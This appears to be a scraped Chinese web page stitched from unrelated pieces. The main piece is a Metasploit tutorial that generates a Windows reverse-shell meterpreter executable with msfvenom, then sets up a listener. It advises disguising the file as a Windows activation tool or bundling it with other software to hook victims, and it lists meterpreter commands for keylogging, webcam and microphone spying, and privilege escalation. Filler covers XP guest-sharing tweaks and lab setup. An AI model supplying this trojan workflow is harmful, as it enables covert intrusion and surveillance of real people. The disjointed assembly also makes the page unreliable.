使用什么命令對目標(biāo)靶機(jī)進(jìn)行溢出攻擊

meterprete的session。在計算機(jī)系統(tǒng)中，win7xp或其他操作系統(tǒng)被稱為靶機(jī)，用戶或黑客用meterpreter的session命令指令后，即可用各種命令對遠(yuǎn)程靶機(jī)進(jìn)行溢出攻擊。

公司主營業(yè)務(wù)：成都網(wǎng)站制作、成都網(wǎng)站設(shè)計、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競爭能力。成都創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團(tuán)隊有機(jī)會用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)推出利辛免費(fèi)做網(wǎng)站回饋大家。

Kali利用msf滲透Windows電腦（超詳細(xì)）

前言

最近整理了一些 奇安信華為深信服大佬 的課件資料+大廠面試課題，想要的可以私信自取， 無償贈送 給粉絲朋友~

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

MSFvenom是Msfpayload和Msfencode的組合，將這兩個工具都放在一個Framework實例中。自2015年6月8日起，msfvenom替換了msfpayload和msfencode。

演示環(huán)境

使用Kali 2021.3進(jìn)行演示操作

目標(biāo)靶機(jī)： Win10專業(yè)版

軟件：msfvenom、msfconsole（Kali系統(tǒng)內(nèi)置）

1.進(jìn)入管理員模式

命令： sudo su

解釋： 不在管理員模式下運(yùn)行可能會有權(quán)限不夠的提示，為了避免命令執(zhí)行失敗，在管理員下運(yùn)行以下命令

命令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號 –f exe –o 文件名.exe

解釋： 本地ip寫自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己隨便設(shè)置一個沒有被占用的端口號，如果端口號被占用那么文件會生成失敗，換一個端口號就性

文件名可以隨便寫自己喜歡的名字，比如寫Win10激活工具，可能更容易讓目標(biāo)主機(jī)上鉤

當(dāng)然MSF也可以用來滲透手機(jī)、mac、Linux等

接下來運(yùn)行命令生成文件

默認(rèn)生成的文件在根目錄下

把剛才生成的文件放到目標(biāo)靶機(jī)Win10系統(tǒng)中

命令： msfconsole

(1)命令： use exploit/multi/handler（選擇模塊）

(2)命令： set payload windows/meterpreter/reverse_tcp（選擇攻擊模塊）

(3)命令： set LhOST 192.168.32.1（填寫自己主機(jī)的IP地址）

(4)命令： set lport 1111（填寫剛才生成文件時的端口號）

(5)命令： show options（查看設(shè)置參數(shù)）

(6)命令： exploit -z -j（后臺執(zhí)行）

我們這里也可以把這個程序偽裝一下，把他的圖標(biāo)改一下，或者把它捆綁在某些軟件上面，當(dāng)用戶打開就自動安裝到對方電腦上面

(1)命令： sessions （查看上鉤的用戶）

(2)命令： sessions -i 1 （選擇需要攻擊的用戶，這里選擇第 1 個

命令： run vnc -i

cmd指令:

cat 讀取文件內(nèi)容到屏幕

cd 更改目錄

checksum 檢索文件的校驗和

cp 將源復(fù)制到目標(biāo)

del 刪除指定文件

dir 列出文件（ls 的別名）

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創(chuàng)建目錄

mv 將源移動到目標(biāo)

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點(diǎn)/邏輯驅(qū)動器

upload 上傳文件或目錄

pkill 按名稱終止進(jìn)程

keyscan_start 開始捕獲擊鍵（開始鍵盤記錄）

keyscan_dump 轉(zhuǎn)儲按鍵緩沖（下載鍵盤記錄）

keyscan_stop 停止捕獲擊鍵（停止鍵盤記錄）

record_mic X秒從默認(rèn)的麥克風(fēng)record_mic音頻記錄（音頻錄制）

webcam_chat 開始視頻聊天（視頻，對方會有彈窗）

webcam_list 單攝像頭（查看攝像頭列表）

webcam_snap 采取快照從指定的攝像頭（攝像頭拍攝一張照片）

webcam_stream 播放視頻流從指定的攝像頭（開啟攝像頭監(jiān)控）

enumdesktops 列出所有可訪問的桌面和窗口站（窗體列表）

getdesktop 得到當(dāng)前的Meterpreter桌面

reboot 重新啟動遠(yuǎn)程計算機(jī)

shutdown 關(guān)閉遠(yuǎn)程計算機(jī)

shell 放入系統(tǒng)命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當(dāng)前的meterpreter桌面

idletime 返回遠(yuǎn)程用戶空閑的秒數(shù)

keyboard_send 發(fā)送擊鍵

keyevent 發(fā)送按鍵事件

keyscan_dump 轉(zhuǎn)儲擊鍵緩沖區(qū)

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發(fā)送鼠標(biāo)事件

screenshare 實時觀看遠(yuǎn)程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當(dāng)前桌面

uictl 控制一些用戶界面組件

record_mic 從默認(rèn)麥克風(fēng)錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網(wǎng)絡(luò)攝像頭

webcam_snap 從指定的網(wǎng)絡(luò)攝像頭拍攝快照

webcam_stream 播放來自指定網(wǎng)絡(luò)攝像頭的視頻流

play 在目標(biāo)系統(tǒng)上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限

execute -f notepad 打開記事本

————————————————

原文鏈接：

如何查找win2003靶機(jī)里的完整計算機(jī)名稱？

首先，這里不考慮物理聯(lián)接和其它問題，只談及策略問題。此外，請安裝相應(yīng)的協(xié)議并正確的設(shè)置IP地址，同時盡量把計算機(jī)設(shè)置在一個工作組內(nèi)且具有相同網(wǎng)段的IP地址。

其次，網(wǎng)上對于出現(xiàn)的問題描述較多，這里不再累述。當(dāng)共享和訪問出現(xiàn)問題時請考慮以下的步驟： 1.檢查guest賬戶是否開啟。在桌面上,對準(zhǔn)我的電腦按右鍵--管理--本地用戶和組--用戶,然后在右邊的方框里在對準(zhǔn)guest按右鍵--屬性--把帳戶已停用的鉤取消即可.

XP默認(rèn)情況下不開啟guest賬戶，因此些為了其他人能瀏覽你的計算機(jī)，請啟用guest賬戶。同時，為了安全請為guest設(shè)置密碼或相應(yīng)的權(quán)限。當(dāng)然，也可以為每一臺機(jī)器設(shè)置一個用戶名和密碼以便計算機(jī)之間的互相訪問。

2.檢查是否拒絕Guest用戶從網(wǎng)絡(luò)訪問本機(jī)

當(dāng)你開啟了guest賬戶卻還是根本不能訪問時，請檢查設(shè)置是否為拒絕guest從網(wǎng)絡(luò)訪問計算機(jī)，因為XP默認(rèn)是不允許guest從網(wǎng)絡(luò)登錄的，所以即使開了guest也一樣不能訪問。在開啟了系統(tǒng)Guest用戶的情況下解除對Guest賬號的限制，點(diǎn)擊“開始→運(yùn)行”，在“運(yùn)行”對話框中輸入“GPEDIT.MSC”，打開組策略編輯器，依次選擇“計算機(jī)配置→Windows設(shè)置→安全設(shè)置→本地策略→用戶權(quán)利指派”，雙擊“拒絕從網(wǎng)絡(luò)訪問這臺計算機(jī)”策略，刪除里面的“GUEST”賬號。這樣其他用戶就能夠用Guest賬號通過網(wǎng)絡(luò)訪問使用Windows XP系統(tǒng)的計算機(jī)了。

3.改網(wǎng)絡(luò)訪問模式

XP默認(rèn)是把從網(wǎng)絡(luò)登錄的所有用戶都按來賓賬戶處理的，因此即使管理員從網(wǎng)絡(luò)登錄也只具有來賓的權(quán)限，若遇到不能訪問的情況，請嘗試更改網(wǎng)絡(luò)的訪問模式。打開組策略編輯器，依次選擇“計算機(jī)配置→Windows設(shè)置→安全設(shè)置→本地策略→安全選項”，雙擊“網(wǎng)絡(luò)訪問：本地賬號的共享和安全模式”策略，將默認(rèn)設(shè)置“僅來賓—本地用戶以來賓身份驗證”，更改為“經(jīng)典：本地用戶以自己的身份驗證”。

這樣即使不開啟guest，你也可以通過輸入本地的賬戶和密碼來登錄你要訪問的計算機(jī)，本地的賬戶和密碼為你要訪問的計算機(jī)內(nèi)已經(jīng)的賬戶和密碼。若訪問網(wǎng)絡(luò)時需要賬戶和密碼，可以通過輸入你要訪問的計算機(jī)內(nèi)已經(jīng)的賬戶和密碼來登錄。

若不對訪問模式進(jìn)行更改，也許你連輸入用戶名和密碼都辦不到，//computername/guest為灰色不可用。即使密碼為空，在不開啟guest的情況下，你也不可能點(diǎn)確定登錄。改成經(jīng)典模式，最低限度可以達(dá)到像2000里沒有開啟guest賬戶情況時一樣，可以輸入用戶名和密碼來登錄你要進(jìn)入的計算機(jī)。也許你還會遇到一種特殊的情況，請看接下來的。

4.一個值得注意的問題

我們可能還會遇到另外一個問題，即當(dāng)用戶的口令為空時，即使你做了上述的所有的更改還是不能進(jìn)行登錄，訪問還是會被拒絕。這是因為，在系統(tǒng)“安全選項”中有“賬戶：使用空白密碼的本地賬戶只允許進(jìn)行控制臺登錄”策略默認(rèn)是啟用的，根據(jù)Windows XP安全策略中拒絕優(yōu)先的原則，密碼為空的用戶通過網(wǎng)絡(luò)訪問使用Windows XP的計算機(jī)時便會被禁止。我們只要將這個策略停用即可解決問題。在安全選項中，找到“使用空白密碼的本地賬戶只允許進(jìn)行控制臺登錄”項，停用就可以，否則即使開了guest并改成經(jīng)典模式還是不能登錄。經(jīng)過以上的更改基本就可以訪問了，你可以嘗試選擇一種適合你的方法。下面在再補(bǔ)充點(diǎn)其它可能會遇到的問題。

5.網(wǎng)絡(luò)鄰居不能看到計算機(jī) 可能經(jīng)常不能在網(wǎng)絡(luò)鄰居中看到你要訪問的計算機(jī)，除非你知道計算機(jī)的名字或者IP地址，通過搜索或者直接輸入//computername或//IP。請按下面的操作解決：啟動“計算機(jī)瀏覽器”服務(wù)?！坝嬎銠C(jī)瀏覽器服務(wù)”在網(wǎng)絡(luò)上維護(hù)一個計算機(jī)更新列表，并將此列表提供給指定為瀏覽器的計算機(jī)。如果停止了此服務(wù)，則既不更新也不維護(hù)該列表。

137/UDP--NetBIOS名稱服務(wù)器，網(wǎng)絡(luò)基本輸入/輸出系統(tǒng)(NetBIOS)名稱服務(wù)器(NBNS)協(xié)議是TCP/IP上的NetBIOS(NetBT)協(xié)議族的一部分，它在基于NetBIOS名稱訪問的網(wǎng)絡(luò)上提供主機(jī)名和地址映射方法。

138/UDP--NetBIOS數(shù)據(jù)報，NetBIOS數(shù)據(jù)報是TCP/IP上的NetBIOS(NetBT)協(xié)議族的一部分，它用于網(wǎng)絡(luò)登錄和瀏覽。

139/TCP--NetBIOS會話服務(wù)，NetBIOS會話服務(wù)是TCP/IP上的NetBIOS(NetBT)協(xié)議族的一部分，它用于服務(wù)器消息塊(SMB)、文件共享和打印。請設(shè)置防火墻開啟相應(yīng)的端口。一般只要在防火墻中允許文件夾和打印機(jī)共享服務(wù)就可以了。

6.關(guān)于共享模式

對共享XP默認(rèn)只給予來賓權(quán)限或選擇允許用戶更改“我的文件”。Windows 2000操作系統(tǒng)中用戶在設(shè)置文件夾的共享屬性時操作非常簡便，只需用鼠標(biāo)右擊該文件夾并選擇屬性，就可以看到共享設(shè)置標(biāo)簽。而在Windows XP系統(tǒng)設(shè)置文件夾共享時則比較復(fù)雜，用戶無法通過上述操作看到共享設(shè)置標(biāo)簽。具體的修改方法如下：打開“我的電腦”中的“工具”，選擇“文件夾屬性”，調(diào)出“查看”標(biāo)簽，在“高級設(shè)置”部分滾動至最底部將“簡單文件共享(推薦)”前面的選擇取消，另外如果選項欄里還有“Mickey Mouse”項也將其選擇取消。這樣修改后用戶就可以象使用Windows 2000一樣對文件夾屬性進(jìn)行方便修改了。

7.關(guān)于用網(wǎng)絡(luò)鄰居訪問不響應(yīng)或者反應(yīng)慢的問題

在WinXP和Win2000中瀏覽網(wǎng)上鄰居時系統(tǒng)默認(rèn)會延遲30秒，Windows將使用這段時間去搜尋遠(yuǎn)程計算機(jī)是否有指定的計劃任務(wù)（甚至有可能到Internet中搜尋）。如果搜尋時網(wǎng)絡(luò)時沒有反應(yīng)便會陷入無限制的等待，那么10多分鐘的延遲甚至報錯就不足為奇了。下面是具體的解決方法。 A.關(guān)掉WinXP的計劃任務(wù)服務(wù)（Task Scheduler）

可以到“控制面板/管理工具/服務(wù)”中打開“Task Scheduler”的屬性對話框，單擊“停止”按鈕停止該項服務(wù)，再將啟動類型設(shè)為“手動”，這樣下次啟動時便不會自動啟動該項服務(wù)了。 B.刪除注冊表中的兩個子鍵

到注冊表中找到主健“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerRemoteComputerNameSpace” 刪除下面的兩個子健。

其中，第一個子健決定網(wǎng)上鄰居是否要搜索網(wǎng)上的打印機(jī)（甚至要到Internet中去搜尋），如果網(wǎng)絡(luò)中沒有共享的打印機(jī)便可刪除此鍵。第二個子健則決定是否需要查找指定的計劃任務(wù)，這是網(wǎng)上鄰居很慢的罪魁禍?zhǔn)?，必須將此子健刪除。

總結(jié)

不能訪問主要是由于XP默認(rèn)不開啟guest，而且即使開了guest，XP默認(rèn)是不允許guest從網(wǎng)絡(luò)訪問計算機(jī)的。還有就是那個值得注意的問題。相信一些不考慮安全的地方或是電腦公司給人做系統(tǒng)密碼都是空的，但這樣是不允許登錄的。只要試過以上的方法，相信是不會再有問題的。

網(wǎng)絡(luò)攻防：攻擊機(jī)（Ubuntu）和靶機(jī)（win2000server）的搭建

【目標(biāo)】：要使【實際主機(jī)】、【攻擊機(jī)】、【靶機(jī)】三方互相ping通

一、搭建靶機(jī)

點(diǎn)擊下一步-完成

二、配置虛擬機(jī)win2000server的網(wǎng)絡(luò)

實際主機(jī)：屬性-啟用

當(dāng)虛擬機(jī)鼠標(biāo)在虛擬機(jī)中出不來時，可以按Ctrl+alt鍵釋放

三、查看靶機(jī)IP

登陸賬號：Administrator密碼：mima1234

硬件向?qū)нx“否”

打開“運(yùn)行”--鍵入cmd

得到靶機(jī)IP地址為：192.168.67.129

四、從實體主機(jī)ping一下靶機(jī)

所以，【實體主機(jī)-靶機(jī)】互通

五、搭建攻擊機(jī)（Linux-Ubuntu）安裝方法同上，以下列舉不同的地方

六、開啟攻擊機(jī)（Ubuntu）

Login:root

password:toor

回車：

輸入：root@bt:~#startx(進(jìn)入Ubuntu的圖形化界面)

點(diǎn)一下如下圖所示的圖案：打開terminal

輸入：root@bt:~#ifconfig(查看Ubuntu的IP地址)

得到Ubuntu的IP地址為：192.168.67.128

七、在攻擊機(jī)上檢查【攻擊機(jī)-實體主機(jī)】和【攻擊機(jī)-靶機(jī)】是否能ping通

查看實體主機(jī)IP地址：+R--cmd

C:\Users\aceripconfig(查看ip地址)

得到實體主機(jī)的IP地址為：10.201.212.16

打開Ubuntu的terminal，嘗試【攻擊機(jī)-實體主機(jī)】ping

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 嘗試【攻擊機(jī)-靶機(jī)】ping

windows7怎么訪問靶機(jī)cms

1、將靶場環(huán)境copy到windows7虛擬機(jī)中。

2、啟動phpStudy。

3、打開phpMyAdmin。

4、將靶機(jī)環(huán)境文件夾放在www目錄下。

5、創(chuàng)建數(shù)據(jù)庫并訪問各個環(huán)境。

靶機(jī)windows xp 用哪個版本

xp professional sp3微軟最新推出的XP SP3 beta版中,原來不像以前傳聞的,只是純粹的一個累積補(bǔ)丁包,它的確包含了從Vista中移植過來的全新功能。 微軟最新推出的XP SP3 Beta的版本為Build 3205,與8月的泄露版不同,這次是正式的官方beta版。 雖然這次推出的版本跟8月泄露的版本(Build 3180)都帶有同樣的名字,但它們是不同的版本。正如前天我們欄目報到過的一樣(見年邁XP最后一個升級 SP3 Beta預(yù)覽版發(fā)布一文),Build 3205已經(jīng)提供給了Vista SP1和Windows Server 2008的beta測試人員。這個XP SP3 Beta名為windowsxp-kb936929-sp3-x86-enu.exe,大小為334.2MB。 新版XP SP3 Beta安裝包(英文版,日文版,德文版)中提供了版本信息并列出了這個補(bǔ)丁包中所包含的所有補(bǔ)丁。與以前的傳聞不同,XP SP3 Beta原來包含了全新的功能,而不只是包含補(bǔ)丁,大部分的新功能都是從Vista移植過來的: --新的Windows產(chǎn)品激活模式:在安裝過程中不必輸入產(chǎn)品碼。 --Vista中頗受歡迎的的網(wǎng)絡(luò)訪問保護(hù)(NAP)模塊與策略也帶到了XP中。 --微軟新的內(nèi)核模式密碼模塊:現(xiàn)在XP SP3的內(nèi)核包含了完整的提供快捷訪問多種密碼算法模塊,并且在內(nèi)核模式驅(qū)動與服務(wù)中已經(jīng)使用。 --新的“Black Hole Router(黑洞路由)”檢測:XP SP3能夠檢測并保護(hù)用戶免受那些會丟失數(shù)據(jù)惡意路由影響。 XP SP3兼容所有Windows x86版本的XP,包括Embedded/Fundamentals/Start/Professional/Media Center和Home Editions版。 XP SP3現(xiàn)在已經(jīng)集成了有1073個補(bǔ)丁,而且還不包括以前的Service Pack。這1073個補(bǔ)丁中,有114個補(bǔ)丁是針對安全相關(guān)的問題的,余下的補(bǔ)丁則針對性能、可靠性,bug修復(fù)補(bǔ)丁,對內(nèi)核模式驅(qū)動模塊的改進(jìn)和很多修復(fù)藍(lán)屏問題的補(bǔ)丁。